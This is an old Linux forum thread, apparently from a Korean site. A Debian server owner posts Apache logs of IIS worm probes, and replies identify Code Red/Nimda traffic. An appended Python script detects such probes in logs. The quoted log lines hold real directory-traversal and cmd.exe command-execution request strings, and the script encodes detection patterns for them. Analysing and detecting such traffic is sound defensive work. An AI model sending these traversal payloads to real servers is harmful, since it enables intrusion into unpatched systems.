A hacking attempt?
Posted by: lacovnk / Posted: Mon, 2004/01/19 - 11:37 AM
error.log shows the following..
Quote:
[Sun Jan 18 06:25:23 2004] [notice] suEXEC mechanism enabled (wrapper: /usr/lib/apache/suexec)
[Sun Jan 18 06:25:23 2004] [notice] Accept mutex: sysvsem (Default: sysvsem)
[Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/scripts/root.exe
[Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/MSADC/root.exe
[Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/c/winnt/system32/cmd.exe
[Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/d/winnt/system32/cmd.exe
[Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/scripts/..%5c../winnt/system32/cmd.exe
[Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/msadc/..%5c../..%5c../..%5c/..?\../..?\../..?\../winnt/system32/cmd.exe
[Sun Jan 18 14:34:25 2004] [error] [client 220.78.158.52] File does not exist: /var/www/scripts/..?\../winnt/system32/cmd.exe
[Sun Jan 18 14:34:26 2004] [error] [client 220.78.158.52] File does not exist: /var/www/scripts/..유../winnt/system32/cmd.exe
[Sun Jan 18 14:34:26 2004] [error] [client 220.78.158.52] File does not exist: /var/www/scripts/..?\../winnt/system32/cmd.exe
[Sun Jan 18 14:34:26 2004] [error] [client 220.78.158.52] File does not exist: /var/www/scripts/..%5c../winnt/system32/cmd.exe
[Sun Jan 18 14:34:26 2004] [error] [client 220.78.158.52] File does not exist: /var/www/scripts/..%2f../winnt/system32/cmd.exe
[Sun Jan 18 19:23:01 2004] [error] [client 220.90.137.45] File does not exist: /var/www/default.ida
[Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/scripts/root.exe
[Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/MSADC/root.exe
[Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/c/winnt/system32/cmd.exe
[Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/d/winnt/system32/cmd.exe
[Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/scripts/..%5c../winnt/system32/cmd.exe
[Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/msadc/..%5c../..%5c../..%5c/..?\../..?\../..?\../winnt/system32/cmd.exe
[Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/scripts/..?\../winnt/system32/cmd.exe
[Sun Jan 18 21:04:13 2004] [error] [client 220.85.126.4] File does not exist: /var/www/scripts/..유../winnt/system32/cmd.exe
[Sun Jan 18 21:04:14 2004] [error] [client 220.85.126.4] File does not exist: /var/www/scripts/..?\../winnt/system32/cmd.exe
[Sun Jan 18 21:04:14 2004] [error] [client 220.85.126.4] File does not exist: /var/www/scripts/..%5c../winnt/system32/cmd.exe
[Sun Jan 18 21:04:14 2004] [error] [client 220.85.126.4] File does not exist: /var/www/scripts/..%2f../winnt/system32/cmd.exe
Alarmed, I dug through access.log..
Quote:
220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:14 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:14 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:14 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:14 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:14 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
At a glance, it looks like they were trying to upload a file and run a malicious script -_-; Scary -_-;;
Is this a method that only applies to Windows servers? (judging by the fact that it's looking for cmd.exe..-_-; )
It's Debian; I keep the packages updated and check with portsentry and chkrootkit, and that's about it..hmm. What else should I be doing..-_-;
Running chkroot, everything comes back "not infected" except the following.
Quote:
Checking `bindshell'... INFECTED (PORTS: 1524 31337)
Ahh~ now I'm needlessly nervous :) Well, it's my personal server, so if it gets wiped only my stuff is lost, which is some consolation -_-;
99% chance it's an infected computer attacking automatically
Looks like a Windows-family computer infected with Nimda or Code Red or whatever it was,
going berserk.
Couldn't you just keep it from being written to the logs, or
block that IP range?
Fellow citizens! Are you happy? Is life any better?
Happy surfing...^_^
I suppose so :)
It must be a Windows-family computer auto-attacking :(
But it looks like a dynamic IP, so it's hard to just block it outright..hmm.
By the way, what's that INFECTED at the end? ㅠㅠ
My guess: the Code Red II worm.
http://www.certcc.or.kr/paper/incident_note/2001/in2001_010.html
Looks like the symptoms described here :)
And bindshell showing up as INFECTED turned out to be because of portsentry ^^;
http://debianusers.org/jsboard/read.php?table=qna&no=5079&page=1&o[sc]=a&o[ss]=chkroot&o[st]=a&o[at]=s&o[sct]=s&o[stt]=s
That's a PC infected with Code Red trying to get in..
It seems to try it against anything with port 80 open..
It exploits an IIS hole, so it won't do a thing against Linux; no need to worry. If the logs are the problem, refer to the document at http://tunelinux.pe.kr/bbs/read.php?table=linuxinfo&no=105 and edit httpd.conf accordingly.
^^;;
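Added here as an illustration (not code from the thread or from any of its posters): a small Python script that parses the access.log lines quoted above and flags the IIS-era worm probes the replies describe, so a Linux admin can see at a glance which sources are worm traffic before deciding whether to block a range or suppress those lines from the log. Its sample input reuses a few of the thread's own lines plus two constructed ones (a Code Red default.ida request and an ordinary page hit); the signature names are this example's own. The normalisation step shows why the probes look so varied: `%255c`, `%%35%63` and `%c0%af` all collapse to the same `../` once percent-decoding is repeated and the overlong UTF-8 forms are mapped.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample: the first five lines are quoted from the thread's access.log,
# the last two are made up (a Code Red default.ida hit and one benign request).
SAMPLE_ACCESS_LOG = """\
220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:13 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
220.85.126.4 - - [18/Jan/2004:21:04:14 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
220.90.137.45 - - [18/Jan/2004:19:23:01 +0900] "GET /default.ida?XXXX HTTP/1.0" 404 280 "-" "-"
10.0.0.7 - - [18/Jan/2004:20:00:00 +0900] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
"""

# Apache common/combined log format: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Overlong / invalid UTF-8 sequences that unpatched IIS once decoded to '/' and '\'.
OVERLONG = [
    (b"\xc0\xaf", b"/"), (b"\xc0\x2f", b"/"),
    (b"\xc1\x9c", b"\\"), (b"\xc1\x1c", b"\\"),
]


def normalize_path(path: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (exposes double encoding such as %255c and %%35%63),
    map the overlong forms, and unify backslashes so every variant reads as '../'."""
    raw = path.split("?", 1)[0].encode("latin-1", "replace")
    for _ in range(rounds):
        decoded = unquote_to_bytes(raw)  # accepts bytes; stray '%' is left untouched
        for overlong, char in OVERLONG:
            decoded = decoded.replace(overlong, char)
        if decoded == raw:  # nothing left to decode
            break
        raw = decoded
    return raw.decode("latin-1").replace("\\", "/")


def classify_request(path: str) -> list:
    """Return the probe signature names a request path matches (empty list = looks benign)."""
    norm = normalize_path(path).lower()
    hits = []
    if norm.endswith("/root.exe") or "/winnt/system32/cmd.exe" in norm:
        hits.append("iis_command_shell")     # root.exe / cmd.exe targets (Code Red II, Nimda)
    if norm.endswith("/default.ida"):
        hits.append("iis_index_server_ida")  # Code Red's entry point
    if "/../" in norm:
        hits.append("path_traversal")        # traversal visible only after decoding
    return hits


def summarize(log_text: str) -> dict:
    """Per source IP: number of probe requests and the signatures seen; benign lines are skipped."""
    report = defaultdict(lambda: {"probes": 0, "signatures": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m["path"])
        if hits:
            entry = report[m["ip"]]
            entry["probes"] += 1
            entry["signatures"].update(hits)
    return dict(report)


if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_ACCESS_LOG).items():
        print(f"{ip}: {info['probes']} probe(s), {sorted(info['signatures'])}")
```

Feed it a real access.log with `summarize(open("/var/log/apache/access.log").read())`; sources that only ever produce these signatures are worm traffic, which is the kind of evidence to keep in hand before blocking an address range that, as the thread notes, may be dynamically assigned. If the goal is simply to stop the noise, Apache's `SetEnvIf` directive combined with `CustomLog ... env=!name` is the standard httpd.conf mechanism for not logging matching requests.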